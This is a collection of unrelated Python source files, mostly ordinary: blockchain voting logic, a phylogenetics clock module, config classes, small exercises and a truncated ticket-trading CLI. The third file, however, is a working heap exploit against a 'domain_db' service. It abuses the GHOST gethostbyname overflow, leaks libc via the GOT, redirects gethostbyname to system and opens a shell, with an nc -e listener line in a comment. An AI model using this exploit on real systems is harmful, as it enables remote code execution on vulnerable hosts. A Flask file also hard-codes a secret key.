.get_all(asset_id, index='asset_id')
.concat_map(lambda block: block['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['asset']['id'] == asset_id))
return [Transaction.from_dict(tx) for tx in cursor]
def get_spent(self, txid, cid):
"""Check if a `txid` was already used as an input.
A transaction can be used as an input for another transaction. Bigchain needs to make sure that a
given `txid` is only used once.
Args:
txid (str): The id of the transaction
cid (num): the index of the condition in the respective transaction
Returns:
The transaction (Transaction) that used the `txid` as an input else
`None`
"""
# checks if an input was already spent
# checks if the bigchain has any transaction with input {'txid': ..., 'cid': ...}
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.concat_map(lambda doc: doc['block']['transactions'])
.filter(lambda transaction: transaction['transaction']['fulfillments']
.contains(lambda fulfillment: fulfillment['input'] == {'txid': txid, 'cid': cid})))
transactions = list(response)
# a transaction_id should have been spent at most one time
if transactions:
# determine if these valid transactions appear in more than one valid block
num_valid_transactions = 0
for transaction in transactions:
# ignore invalid blocks
# FIXME: Isn't there a faster solution than doing I/O again?
if self.get_transaction(transaction['id']):
num_valid_transactions += 1
if num_valid_transactions > 1:
raise exceptions.DoubleSpend('`{}` was spent more than once. There is a problem with the chain'.format(
txid))
if num_valid_transactions:
return Transaction.from_dict(transactions[0])
else:
# all queried transactions were invalid
return None
else:
return None
def get_owned_ids(self, owner):
"""Retrieve a list of `txid`s that can be used as inputs.
Args:
owner (str): base58 encoded public key.
Returns:
:obj:`list` of TransactionLink: list of `txid`s and `cid`s
pointing to another transaction's condition
"""
# get all transactions in which owner is in the `owners_after` list
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.concat_map(lambda doc: doc['block']['transactions'])
.filter(lambda tx: tx['transaction']['conditions']
.contains(lambda c: c['owners_after']
.contains(owner))))
owned = []
for tx in response:
# disregard transactions from invalid blocks
validity = self.get_blocks_status_containing_tx(tx['id'])
if Bigchain.BLOCK_VALID not in validity.values():
if Bigchain.BLOCK_UNDECIDED not in validity.values():
continue
# NOTE: It's OK to not serialize the transaction here, as we do not
# use it after the execution of this function.
# a transaction can contain multiple outputs (conditions) so we need to iterate over all of them
# to get a list of outputs available to spend
for index, cond in enumerate(tx['transaction']['conditions']):
# for simple signature conditions there are no subfulfillments
# check if the owner is in the condition `owners_after`
if len(cond['owners_after']) == 1:
if cond['condition']['details']['public_key'] == owner:
tx_link = TransactionLink(tx['id'], index)
else:
# for transactions with multiple `owners_after` there will be several subfulfillments nested
# in the condition. We need to iterate the subfulfillments to make sure there is a
# subfulfillment for `owner`
if util.condition_details_has_owner(cond['condition']['details'], owner):
tx_link = TransactionLink(tx['id'], index)
# check if input was already spent
if not self.get_spent(tx_link.txid, tx_link.cid):
owned.append(tx_link)
return owned
def create_block(self, validated_transactions):
"""Creates a block given a list of `validated_transactions`.
Note that this method does not validate the transactions. Transactions
should be validated before calling create_block.
Args:
validated_transactions (list(Transaction)): list of validated
transactions.
Returns:
Block: created block.
"""
# Prevent the creation of empty blocks
if len(validated_transactions) == 0:
raise exceptions.OperationError('Empty block creation is not '
'allowed')
voters = self.nodes_except_me + [self.me]
block = Block(validated_transactions, self.me, gen_timestamp(), voters)
block = block.sign(self.me_private)
return block
# TODO: check that the votings structure is correctly constructed
def validate_block(self, block):
"""Validate a block.
Args:
block (Block): block to validate.
Returns:
The block if the block is valid, otherwise it raises an exception
describing the reason why the block is invalid.
"""
return self.consensus.validate_block(self, block)
def has_previous_vote(self, block_id, voters):
"""Check for previous votes from this node
Args:
block_id (str): the id of the block to check
voters (list(str)): the voters of the block to check
Returns:
bool: :const:`True` if this block already has a
valid vote from this node, :const:`False` otherwise.
Raises:
ImproperVoteError: If there is already a vote,
but the vote is invalid.
"""
votes = list(self.connection.run(
r.table('votes', read_mode=self.read_mode)
.get_all([block_id, self.me], index='block_and_voter')))
if len(votes) > 1:
raise exceptions.MultipleVotesError('Block {block_id} has {n_votes} votes from public key {me}'
.format(block_id=block_id, n_votes=str(len(votes)), me=self.me))
has_previous_vote = False
if votes:
if util.verify_vote_signature(voters, votes[0]):
has_previous_vote = True
else:
raise exceptions.ImproperVoteError('Block {block_id} already has an incorrectly signed vote '
'from public key {me}'.format(block_id=block_id, me=self.me))
return has_previous_vote
def write_block(self, block, durability='soft'):
"""Write a block to bigchain.
Args:
block (Block): block to write to bigchain.
"""
self.connection.run(
r.table('bigchain')
.insert(r.json(block.to_str()), durability=durability))
def transaction_exists(self, transaction_id):
response = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)\
.get_all(transaction_id, index='transaction_id'))
return len(response.items) > 0
def prepare_genesis_block(self):
"""Prepare a genesis block."""
metadata = {'message': 'Hello World from the BigchainDB'}
transaction = Transaction.create([self.me], [self.me],
metadata=metadata)
# NOTE: The transaction model doesn't expose an API to generate a
# GENESIS transaction, as this is literally the only usage.
transaction.operation = 'GENESIS'
transaction = transaction.sign([self.me_private])
# create the block
return self.create_block([transaction])
def create_genesis_block(self):
"""Create the genesis block
Block created when bigchain is first initialized. This method is not atomic, there might be concurrency
problems if multiple instances try to write the genesis block when the BigchainDB Federation is started,
but it's a highly unlikely scenario.
"""
# 1. create one transaction
# 2. create the block with one transaction
# 3. write the block to the bigchain
blocks_count = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.count())
if blocks_count:
raise exceptions.GenesisBlockAlreadyExistsError('Cannot create the Genesis block')
block = self.prepare_genesis_block()
self.write_block(block, durability='hard')
return block
def vote(self, block_id, previous_block_id, decision, invalid_reason=None):
"""Create a signed vote for a block given the
:attr:`previous_block_id` and the :attr:`decision` (valid/invalid).
Args:
block_id (str): The id of the block to vote on.
previous_block_id (str): The id of the previous block.
decision (bool): Whether the block is valid or invalid.
invalid_reason (Optional[str]): Reason the block is invalid
"""
if block_id == previous_block_id:
raise exceptions.CyclicBlockchainError()
vote = {
'voting_for_block': block_id,
'previous_block': previous_block_id,
'is_block_valid': decision,
'invalid_reason': invalid_reason,
'timestamp': gen_timestamp()
}
vote_data = serialize(vote)
signature = crypto.SigningKey(self.me_private).sign(vote_data.encode())
vote_signed = {
'node_pubkey': self.me,
'signature': signature,
'vote': vote
}
return vote_signed
def write_vote(self, vote):
"""Write the vote to the database."""
self.connection.run(
r.table('votes')
.insert(vote))
def get_last_voted_block(self):
"""Returns the last block that this node voted on."""
try:
# get the latest value for the vote timestamp (over all votes)
max_timestamp = self.connection.run(
r.table('votes', read_mode=self.read_mode)
.filter(r.row['node_pubkey'] == self.me)
.max(r.row['vote']['timestamp']))['vote']['timestamp']
last_voted = list(self.connection.run(
r.table('votes', read_mode=self.read_mode)
.filter(r.row['vote']['timestamp'] == max_timestamp)
.filter(r.row['node_pubkey'] == self.me)))
except r.ReqlNonExistenceError:
# return last vote if last vote exists else return Genesis block
res = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.filter(util.is_genesis_block))
block = list(res)[0]
return Block.from_dict(block)
# Now the fun starts. Since the resolution of timestamp is a second,
# we might have more than one vote per timestamp. If this is the case
# then we need to rebuild the chain for the blocks that have been retrieved
# to get the last one.
# Given a block_id, mapping returns the id of the block pointing at it.
mapping = {v['vote']['previous_block']: v['vote']['voting_for_block']
for v in last_voted}
# Since we follow the chain backwards, we can start from a random
# point of the chain and "move up" from it.
last_block_id = list(mapping.values())[0]
# We must be sure to break the infinite loop. This happens when:
# - the block we are currently iterating is the one we are looking for.
# This will trigger a KeyError, breaking the loop
# - we are visiting again a node we already explored, hence there is
# a loop. This might happen if a vote points both `previous_block`
# and `voting_for_block` to the same `block_id`
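# Worked example (hypothetical ids): votes for B2 (previous B1) and B3 (previous B2)
# give mapping == {'B1': 'B2', 'B2': 'B3'}; starting from any value and repeatedly
# looking it up ends at 'B3', the last voted block, via the KeyError below.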
explored = set()
while True:
try:
if last_block_id in explored:
raise exceptions.CyclicBlockchainError()
explored.add(last_block_id)
last_block_id = mapping[last_block_id]
except KeyError:
break
res = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.get(last_block_id))
return Block.from_dict(res)
def get_unvoted_blocks(self):
"""Return all the blocks that have not been voted on by this node.
Returns:
:obj:`list` of :obj:`dict`: a list of unvoted blocks
"""
unvoted = self.connection.run(
r.table('bigchain', read_mode=self.read_mode)
.filter(lambda block: r.table('votes', read_mode=self.read_mode)
.get_all([block['id'], self.me], index='block_and_voter')
.is_empty())
.order_by(r.asc(r.row['block']['timestamp'])))
# FIXME: I (@vrde) don't like this solution. Filtering should be done at a
# database level. Solving issue #444 can help untangling the situation
unvoted_blocks = filter(lambda block: not util.is_genesis_block(block), unvoted)
return unvoted_blocks
def block_election_status(self, block_id, voters):
"""Tally the votes on a block, and return the status: valid, invalid, or undecided."""
votes = self.connection.run(r.table('votes', read_mode=self.read_mode)
.between([block_id, r.minval], [block_id, r.maxval], index='block_and_voter'))
votes = list(votes)
n_voters = len(voters)
voter_counts = collections.Counter([vote['node_pubkey'] for vote in votes])
for node in voter_counts:
if voter_counts[node] > 1:
raise exceptions.MultipleVotesError('Block {block_id} has multiple votes ({n_votes}) from voting node {node_id}'
.format(block_id=block_id, n_votes=str(voter_counts[node]), node_id=node))
if len(votes) > n_voters:
raise exceptions.MultipleVotesError('Block {block_id} has {n_votes} votes cast, but only {n_voters} voters'
.format(block_id=block_id, n_votes=str(len(votes)), n_voters=str(n_voters)))
# vote_cast is the list of votes e.g. [True, True, False]
vote_cast = [vote['vote']['is_block_valid'] for vote in votes]
# prev_block are the ids of the nominal prev blocks e.g.
# ['block1_id', 'block1_id', 'block2_id']
prev_block = [vote['vote']['previous_block'] for vote in votes]
# vote_validity checks whether a vote is valid
# or invalid, e.g. [False, True, True]
vote_validity = [self.consensus.verify_vote_signature(voters, vote) for vote in votes]
# element-wise product of stated vote and validity of vote
# vote_cast = [True, True, False] and
# vote_validity = [False, True, True] gives
# [True, False]
# Only the correctly signed votes are tallied.
vote_list = list(compress(vote_cast, vote_validity))
# Total the votes. Here, valid and invalid refer
# to the vote cast, not whether the vote itself
# is valid or invalid.
n_valid_votes = sum(vote_list)
n_invalid_votes = len(vote_cast) - n_valid_votes
# The use of ceiling and floor is to account for the case of an
# even number of voters where half the voters have voted 'invalid'
# and half 'valid'. In this case, the block should be marked invalid
# to avoid a tie. In the case of an odd number of voters this is not
# relevant, since one side must be a majority.
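# e.g. with 4 voters: 2 'invalid' votes >= ceil(4/2) = 2 marks the block invalid,
# so a 2-2 split cannot stay undecided, while 'valid' needs > floor(4/2) = 2,
# i.e. at least 3 votes.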
if n_invalid_votes >= math.ceil(n_voters / 2):
return Bigchain.BLOCK_INVALID
elif n_valid_votes > math.floor(n_voters / 2):
# The block could be valid, but we still need to check if votes
# agree on the previous block.
#
# First, only consider blocks with legitimate votes
prev_block_list = list(compress(prev_block, vote_validity))
# Next, only consider the blocks with 'yes' votes
prev_block_valid_list = list(compress(prev_block_list, vote_list))
counts = collections.Counter(prev_block_valid_list)
# Make sure the majority vote agrees on the previous block.
# The majority vote must be the most common, by definition.
# If it's not, there is no majority agreement on the previous
# block.
if counts.most_common()[0][1] > math.floor(n_voters / 2):
return Bigchain.BLOCK_VALID
else:
return Bigchain.BLOCK_INVALID
else:
return Bigchain.BLOCK_UNDECIDED
|
from .baseclock import BaseClock
from beastling.util import xml
class RandomLocalClock(BaseClock):
__type__ = 'random'
def __init__(self, clock_config, global_config):
BaseClock.__init__(self, clock_config, global_config)
self.is_strict = False
self.correlated = clock_config.correlated
self.estimate_variance = True if clock_config.estimate_variance is None \
else clock_config.estimate_variance
def add_state(self, state):
BaseClock.add_state(self, state)
xml.stateNode(
state,
text=False,
id="Indicators.c:%s" % self.name,
spec="parameter.BooleanParameter",
dimension=42)
xml.stateNode(
state,
text="0.1",
id="clockrates.c:%s" % self.name,
spec="parameter.RealParameter",
dimension=42)
self.shape_id = "randomClockGammaShape:%s" % self.name
# Domain and initial values for Gamma params copied from rate heterogeneity
# implementation in BaseModel
xml.parameter(
state, text="5.0", id=self.shape_id, name="stateNode", lower="1.1", upper="1000.0")
self.scale_id = "randomClockGammaScale:%s" % self.name
xml.parameter(state, text="0.2", id=self.scale_id, name="stateNode")
def add_prior(self, prior):
BaseClock.add_prior(self, prior)
# Gamma prior over rates
sub_prior = xml.prior(
prior,
id="RandomRatesPrior.c:%s" % self.name,
name="distribution",
x="@clockrates.c:%s" % self.name)
xml.Gamma(
sub_prior,
id="RandomRatesPrior:%s" % self.name,
name="distr",
alpha="@%s" % self.shape_id,
beta="@%s" % self.scale_id)
# Exponential prior over Gamma scale parameter
# (mean param copied from rate heterogeneity implementation in BaseModel)
if self.estimate_variance:
sub_prior = xml.prior(
prior,
id="randomClockGammaScalePrior.s:%s" % self.name,
name="distribution",
x="@%s" % self.shape_id)
xml.Exponential(
sub_prior,
id="randomClockGammaScalePriorExponential.s:%s" % self.name,
mean="0.23",
name="distr")
# Poisson prior over number of rate changes
sub_prior = xml.prior(
prior, id="RandomRateChangesPrior.c:%s" % self.name, name="distribution")
xml.x(
sub_prior,
id="RandomRateChangesCount:%s" % self.name,
spec="util.Sum",
arg="@Indicators.c:%s" % self.name)
poisson = xml.distr(
sub_prior,
id="RandomRatechangesPoisson.c:%s" % self.name,
spec="beast.math.distributions.Poisson")
xml.parameter(
poisson,
text="0.6931471805599453",
id="RandomRateChangesPoissonLambda:%s" % self.name,
estimate=False,
name="lambda")
# Should we be estimating and have a prior on the Poisson parameter?
def add_branchrate_model(self, beast):
xml.branchRateModel(
beast,
attrib={"clock.rate":self.mean_rate_idref},
id="RandomLocalClock.c:%s"%self.name,
spec="beast.evolution.branchratemodel.RandomLocalClockModel",
indicators="@Indicators.c:%s" % self.name,
rates="@clockrates.c:%s" % self.name,
ratesAreMultipliers=self.correlated,
tree="@Tree.t:beastlingTree")
self.branchrate_model_id = "RandomLocalClock.c:%s" % self.name
def add_operators(self, run):
BaseClock.add_operators(self, run)
# Operate on indicators
xml.operator(
run,
id="IndicatorsBitFlip.c:%s" % self.name,
spec="BitFlipOperator",
parameter="@Indicators.c:%s" % self.name,
weight="15.0")
# Operate on branch rates
xml.operator(
run,
id="ClockRateScaler.c:%s" % self.name,
spec="ScaleOperator",
parameter="@clockrates.c:%s" % self.name,
scaleFactor="0.5",
weight="15.0")
# Up/down for Gamma params
if self.estimate_variance:
updown = xml.operator(
run,
id="randomClockGammaUpDown:%s" % self.name,
spec="UpDownOperator",
scaleFactor="0.5",
weight="1.0")
xml.parameter(updown, idref=self.shape_id, name="up")
xml.parameter(updown, idref=self.scale_id, name="down")
def add_param_logs(self, logger):
BaseClock.add_param_logs(self, logger)
xml.log(logger, idref="Indicators.c:%s" % self.name)
xml.log(logger, idref="clockrates.c:%s" % self.name)
xml.log(logger, idref="RandomRateChangesCount:%s" % self.name)
xml.log(logger, idref=self.shape_id)
|
from zio import *
import sys,os,subprocess,time
'''
checksec --file domain_db
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Partial RELRO Canary found NX enabled No PIE No RPATH No RUNPATH domain_db
note:
http://libcdb.com/search?symbolA=__libc_start_main&addressA=0xf7e513e0&symbolB=setsockopt&addressB=0xf7f246d0
libc info:
Operating System:
Ubuntu Linux
type:
ELF
architecture:
x86
download:
libc-2.15_1.so
run:
export LD_PRELOAD=/root/Desktop/IMDB/libc.so.6
while true;do nc -vv -l -p 10001 -e ./domain_db;killall -s 9 domain_db;done
reference:
http://www.openwall.com/lists/oss-security/2015/01/27/9
'''
def exploit(host):
io = None
try:
io = zio(host, timeout=1000, print_read=False, print_write=False)
if not io :
raise Exception
except:
print 'can\'t connect to the server!'
exit(0)
def add_domain(name):
assert len(name) < 0x800
io.read_until('>')
io.writeline('1')
io.writeline(name)
def edit_domain(id, name):
assert len(name) < 0x800
io.read_until('>')
io.writeline('2')
io.writeline(str(id))
io.writeline(name)
def remove_domain(id):
io.read_until('>')
io.writeline('3')
io.writeline(str(id))
def list_domain():
io.read_until('>')
io.writeline('4')
def lookup_domain(id):
io.read_until('>')
io.writeline('5')
io.writeline(str(id))
#leak heap base
def leak_heap():
pass
#leak libc base
def leak_libc():
pass
fake_size = l16(0x3031)
ghost_size = 0x400 - 16*1 - 4*2
chunk_0 = '0' * ghost_size + fake_size
add_domain(chunk_0)
chunk_1 = '1'* (0x400 - 0x88)
add_domain(chunk_1)
# if P->fd_nextsize != NULL ; then will do the below checking for large bins unlinking:
# 1. victim->fd_nextsize->bk_nextsize == victim
# 2. victim->bk_nextsize->fd_nextsize == victim
fd_next_large_size = '\x00\x00\x00\x00' # set to NULL so it gets past the safe-unlink checks
chunk_2 = '2222' + '2222' + fd_next_large_size + '2222' + '2' * (0x20 - 4*4)
add_domain(chunk_2)
# chunk_3 will be overwritten by chunk_5
chunk_3 = '3'* 0x20
add_domain(chunk_3)
# free chunk_1:
# the 0x400-byte heap buffer allocated by gethostbyname
# will take the place of the one chunk_1 deallocated!
remove_domain(1)
# free chunk_2
remove_domain(2)
# overwrite the size field of chunk_2
lookup_domain(0)
# just for chunk padding
chunk_4 = '4'* 0x20
add_domain(chunk_4)
# read_where_what
gethost_got = 0x804B034
read_where = l32(gethost_got)
chunk_5 = '5'*0x28 + read_where
add_domain(chunk_5) # overwrite chunk_3
# leakage libc info
list_domain()
io.read_until('<3> ')
gethostbyname = l32(io.read(4))
print '[+] gethostbyname\t@\t{0}'.format(hex(gethostbyname))
libc_base = gethostbyname - 0x1020c0 #remote
print '[+] libc_base\t\t@\t{0}'.format(hex(libc_base))
system = libc_base + 0x3d170
print '[+] system\t\t@\t{0}'.format(hex(system))
# write_where_what
write_what = l32(system)
edit_domain(3, write_what) # update chunk_3 to overwrite the value of gethostbyname_got with system
# get shell
cmd = '/bin/sh'
add_domain(cmd)
lookup_domain(4) # calls gethostbyname, which now points to system
io.writeline('id')
io.interact()
if __name__ == '__main__':
host = ('127.0.0.1',10001)
exploit(host)
|
#!/usr/bin/env python
# .. See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ensembl.production.core.config import load_config_yaml
class config():
config_file_path = os.environ.get('EVENT_CONFIG_PATH', os.path.join(os.path.dirname(__file__),
'event_config.dev.yaml'))
file_config = load_config_yaml(config_file_path)
report_server = os.environ.get("REPORT_SERVER",
file_config.get('report_server', "amqp://guest:guest@localhost:5672/"))
report_exchange = os.environ.get("REPORT_EXCHANGE",
file_config.get('report_exchange', 'event_report_exchange'))
report_exchange_type = os.environ.get("REPORT_EXCHANGE_TYPE",
file_config.get('report_exchange_type', 'topic'))
event_uri = os.environ.get("EVENT_URI",
file_config.get('event_uri', 'http://localhost:5000/'))
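# Lookup order for every setting above, using REPORT_SERVER as an example:
# the REPORT_SERVER environment variable, then the 'report_server' key in the YAML
# file located via EVENT_CONFIG_PATH, then the hard-coded default
# "amqp://guest:guest@localhost:5672/".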
class EventConfig(config):
"""Config For Event App """
event_lookup = os.environ.get("EVENT_LOOKUP_FILE",
config.file_config.get('event_lookup_file',
os.path.join(os.path.dirname(__file__), "./event_lookup.json")))
process_lookup = os.environ.get("PROCESS_LOOKUP_FILE",
config.file_config.get('process_lookup_file',
os.path.join(os.path.dirname(__file__), "./process_lookup.json")))
# hive_url = os.environ.get("HIVE_URL",config.file_config.get('hive_url', ''))
# farm_user = os.environ.get("FARM_USER",config.file_config.get('user', ''))
ES_HOST = os.environ.get('ES_HOST', config.file_config.get('es_host', ''))
ES_PORT = os.environ.get('ES_PORT', config.file_config.get('es_port', ''))
ES_INDEX = os.environ.get('ES_INDEX', config.file_config.get('es_index', 'reports_workflow'))
RELEASE = os.environ.get('ENS_RELEASE', config.file_config.get('ens_release', '105'))
EG_RELEASE = os.environ.get('EG_RELEASE', config.file_config.get('eg_release', '52'))
RR_RELEASE = os.environ.get('RR_RELEASE', config.file_config.get('rr_release', '24'))
class EventCeleryConfig(config):
""" Config For Celery App"""
broker_url = os.environ.get("CELERY_BROKER_URL",
config.file_config.get('celery_broker_url', 'pyamqp://guest:guest@localhost:5672/'))
result_backend = os.environ.get("CELERY_RESULT_BACKEND",
config.file_config.get('celery_result_backend', 'rpc://guest:guest@localhost:5672/'))
smtp_server = os.environ.get("SMTP_SERVER",
config.file_config.get('smtp_server', 'localhost'))
from_email_address = os.environ.get("FROM_EMAIL_ADDRESS",
config.file_config.get('from_email_address', 'ensembl-production@ebi.ac.uk'))
retry_wait = int(os.environ.get("RETRY_WAIT",
config.file_config.get('retry_wait', 60)))
task_track_started=True
result_persistent=True
task_routes = {
#'ensembl.event.celery.tasks': {'queue': 'event'},
#'ensembl.event.celery.tasks.workflow_*': {'queue': 'workflow'},
#'ensembl.event.celery.tasks.monitor_*': {'queue': 'monitor'}
}
class PySagaConfig(config):
NOAH = {
'REMOTE_HOST': os.environ.get("REMOTE_HOST_NOAH", config.file_config.get("remote_host_noah", "")),
'ADDRESS' : os.environ.get("ADDRESS_NOAH", config.file_config.get("address_noah","")),
'USER' : os.environ.get("USER", config.file_config.get("user","vinay")), # vaild user in remote host
'PASSWORD' : os.environ.get("PASSWORD", ""), # required only if ssh is not configured for remote user
'WORKING_DIR' : os.environ.get('WORKING_DIR', config.file_config.get("pwd", "/homes/vinay/new_rapid_test")) # Your working directory to store logs and temp dirs
}
CODON = {
'REMOTE_HOST': os.environ.get("REMOTE_HOST_CODON", config.file_config.get("remote_host_codon", "")),
'ADDRESS' : os.environ.get("ADDRESS_NOAH", config.file_config.get("address_noah","")),
'USER' : os.environ.get("USER", config.file_config.get("user","vinay")), # vaild user in remote host
'PASSWORD' : os.environ.get("PASSWORD", ""), # required only if ssh is not configured for remote user
'WORKING_DIR' : os.environ.get('WORKING_DIR', config.file_config.get("pwd", "/homes/vinay/new_rapid_test")) # Your working directory to store logs and temp dirs
}
DEFAULT_HOST_DETAILS = os.environ.get("DEFAULT_HOST_DETAILS", config.file_config.get("default_host_details", ""))
FARM_USER = os.environ.get("FARM_USER",config.file_config.get('user', 'vinay'))
HIVE_URL = os.environ.get("HIVE_URL", config.file_config.get("hive_url", '')) # hive database string
|
lista = list()
while True:
lista.append(int(input('Enter a number: ')))
while True:
fim = str(input('Do you want to continue? [Y/N] ')).upper()[0]
if fim in 'YN':
break
if fim in 'N':
break
lista.sort(reverse=True) # Sort the values in the list in descending order
print(f'\nThe list has {len(lista)} numbers')
print(f'The values in your list are: {lista}')
if 5 in lista:
print('The value 5 is in the list!')
else:
print('The value 5 is NOT in the list!')
|
from flask import Flask
app = Flask(__name__)
app.jinja_env.auto_reload = True
app.config['TEMPLATES_AUTO_RELOAD'] = True
# Set the secret key to some random bytes. Keep this really secret!
app.secret_key = b'_5#y2L"F4Q8z\n\xec]/'
from app import routes |
class Solution(object):
# Recursion + memoization; when k is very large, fall back to the unlimited-transaction case as an optimization
def maxProfit(self, k, prices):
"""
:type k: int
:type prices: List[int]
:rtype: int
"""
if not prices or k<=0:
return 0
n = len(prices)
if k>n/2:
dp = [[0 for _ in xrange(2)] for _ in xrange(n)]
dp[0][0] = 0
dp[0][1] = -prices[0]
for i in xrange(1,n):
dp[i][0] = max(dp[i-1][0],dp[i-1][1]+prices[i])
dp[i][1] = max(dp[i-1][1],dp[i-1][0]-prices[i])
return max(dp[n-1][0],0)
mem = [[[-1 for _ in xrange(2)] for _ in xrange(k+1)] for _ in xrange(n)]
def dfs(index,count,status):
if index==n or (count==k and status==0):
return 0
if mem[index][count][status]>-1:
return mem[index][count][status]
a = dfs(index+1,count,status)
b,c = 0,0
if status:
b = dfs(index+1,count,0)+prices[index]
else:
c = dfs(index+1,count+1,1)-prices[index]
mem[index][count][status] = max(a,b,c)
return mem[index][count][status]
return dfs(0,0,0)
# Plain recursion (times out)
def maxProfit(self, k, prices):
"""
:type k: int
:type prices: List[int]
:rtype: int
"""
if not prices:
return 0
n = len(prices)
def dfs(index,count,status):
if index==n or (count==k and status==0):
return 0
a = dfs(index+1,count,status)
b,c = 0,0
if status:
b = dfs(index+1,count,0)+prices[index]
else:
c = dfs(index+1,count+1,1)-prices[index]
return max(a,b,c)
return dfs(0,0,0)
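# Note that the second maxProfit definition shadows the first one on this class.
# Quick sanity check (the standard LeetCode 188 example):
#   Solution().maxProfit(2, [3, 2, 6, 5, 0, 3]) == 7 (buy at 2/sell at 6, buy at 0/sell at 3)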
|
# -*- coding: utf-8 -*-
from .clone import CloneCommand
from .commit import CommitCommand
from .fetch import FetchCommand
from .init import InitCommand
__all__ = ["CloneCommand", "CommitCommand", "FetchCommand", "InitCommand"]
|
from provision.main import parse_args
from typing import Any, List
from azure import eventhub
from azure.cosmosdb import table
import logging
import json
import torch
import argparse
import os
import sys
def create_logger(log_level: int = logging.DEBUG) -> logging.Logger:
logger = logging.Logger(name="processor", level=log_level)
formatter = logging.Formatter(
fmt='[%(levelname)s] [%(asctime)s] [%(filename)s] [L%(lineno)s] %(message)s')
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(fmt=formatter)
logger.addHandler(stream_handler)
return logger
LOGGER = create_logger(log_level=logging.DEBUG)
parser = argparse.ArgumentParser(
"Processing a batch of events from EventHub and save to CosmosDB")
parser.add_argument('-c', '--config', type=str,
default='/src/config.json', help='The path to config file')
parser.add_argument('-m', '--model', type=str, default='/src/best.pth',
help='The path to the model weights file. It should be compatible with PyTorch v1.8.0 or later.')
ARGS = parser.parse_args()
def read_config(filepath: str = "./config.json") -> dict:
return json.load(open(filepath, 'r'))
try:
CONFIG = read_config(ARGS.config)
except Exception as e:
LOGGER.error(e)
sys.exit(1)
MODEL_PATH = ARGS.model
if not os.path.exists(MODEL_PATH):
LOGGER.error(f"Could not find the model {MODEL_PATH}. Exiting ...")
sys.exit(1)
def load_model(model_path, config: dict) -> torch.nn.Module:
"""
This loads the model using PyTorch.
TODO: if using third-party libs, add them here.
:param model_path the path to the model weights
:param config the JSON object config
:return Loaded model
"""
pass
def fetch_events(config: dict) -> List[Any]:
"""
Fetch the events from EventHub.
:param config the JSON object config
:return a list of events
"""
pass
def process_events(events: List[Any], config: dict, model: torch.nn.Module) -> List[Any]:
"""
Running inference on fetched events from EventHub.
:param events fetched raw events
:param config the JSON object config
:param model the model for inference
:return a list of processed events
"""
pass
def save_results_to_cosmosdb(events: List[Any], config: dict) -> None:
"""
Save computed results to CosmosDB Table.
:param events computed events
:param config the JSON object config
:return
"""
pass
def main():
pass
if __name__ == '__main__':
main()
|
from pysdd.util import BitArray
import sys
import os
import logging
from pathlib import Path
logger = logging.getLogger("pysdd")
def test_bitarray1():
b = BitArray(10)
print(b)
assert b[4] is False
assert b[3] is False
assert b[2] is False
b[4] = 1
b[2] = True
print(b)
assert b[4] is True
assert b[3] is False
assert b[2] is True
b[4] = 0
b[2] = False
print(b)
assert b[4] is False
assert b[3] is False
assert b[2] is False
def test_bitarray2():
b = BitArray(100) # more than 32 bits
print(b)
assert b[60] is False
assert b[90] is False
b[60] = True
b[90] = True
print(b)
assert b[60] is True
assert b[90] is True
if __name__ == "__main__":
logger.setLevel(logging.DEBUG)
sh = logging.StreamHandler(sys.stdout)
logger.addHandler(sh)
directory = Path(os.environ.get('TESTDIR', Path(__file__).parent))
print(f"Saving files to {directory}")
test_bitarray1()
|
import os
import sys
import time
import requests
import json
class MajPoll:
def __init__(self, question):
self.question = question
self.user_answers = { }
self.has_ended = False
def vote(self, answer, user):
if self.has_ended:
return # voting has concluded
self.user_answers[user] = answer.lower()
def get_total_vote_count(self):
return len(self.user_answers.keys())
def get_answers(self):
answers = {}
for a in self.user_answers.values():
if a in answers:
answers[a] += 1
else:
answers[a] = 1
return dict(sorted(answers.items(), key=lambda item: item[1], reverse=True))
def get_poll_results(self):
msg = f" Total votes: {self.get_total_vote_count()} || "
answers = self.get_answers()
distinct_counts = []
for c in answers.values():
if c not in distinct_counts:
distinct_counts.append(c)
for count in distinct_counts:
p = "person" if count == 1 else "people"
answers = []
for k,v in self.get_answers().items():
if v != count: continue
answers.append(k)
msg += f"{count} {p} voted ... {' - '.join(answers)} ██ "
return msg
def demo_poll():
p = MajPoll("what is your favorite beer?")
p.vote("pilsner", "steve")
p.vote("hazy ipa", "bob")
p.vote("hazy ipa", "cheryl")
p.vote("hazy ipa", "alice")
p.vote("stout", "alice")
p.has_ended = True
p.vote("pilsner", "dave")
print(p.get_answers())
print(p.get_total_vote_count())
print(p.get_poll_results())
|
#!/usr/bin/python
import sys
import ZeroBorg
zb = ZeroBorg.ZeroBorg()
zb.Init()
zb.SetMotor1(0)
zb.SetMotor2(0)
zb.SetMotor3(0)
zb.SetMotor4(0)
|
import csv
import time
import re
status = False
user_name = ''
user_email = ''
user_password = ''
balance = -1
accFile = open('accounts.csv', 'r+')
ticketFile = open('tickets.csv', 'r+')
accReader = csv.reader(accFile)
ticketReader = csv.reader(ticketFile)
location_arg = open('frontend_locations.txt', 'r').readline()
tranFile = open(location_arg+'_transactions.csv', 'a+', newline='')
tranWriter = csv.writer(tranFile)
def main():
print('Welcome to the Queens ticket trade machine')
R1()
def R1():
if status:
print('your balance:', balance) # print out the user's balance
input1 = input('type your choice:\nsell buy update logout\n')
if input1 == 'sell': # user wants to go to sell session
R4()
elif input1 == 'buy': # user wants to go to buy session
R5()
elif input1 == 'update': # user wants to go to update session
R6()
elif input1 == 'logout': # user wants to go to logout session
R7()
else: # user enters other invalid commands
print('invalid command')
R1()
if not status:
input1 = input('type your choice:\nregister login exit\n')
if input1 == 'register': # user wants to go to register session
R2()
elif input1 == 'login': # user wants to go to login session
R3()
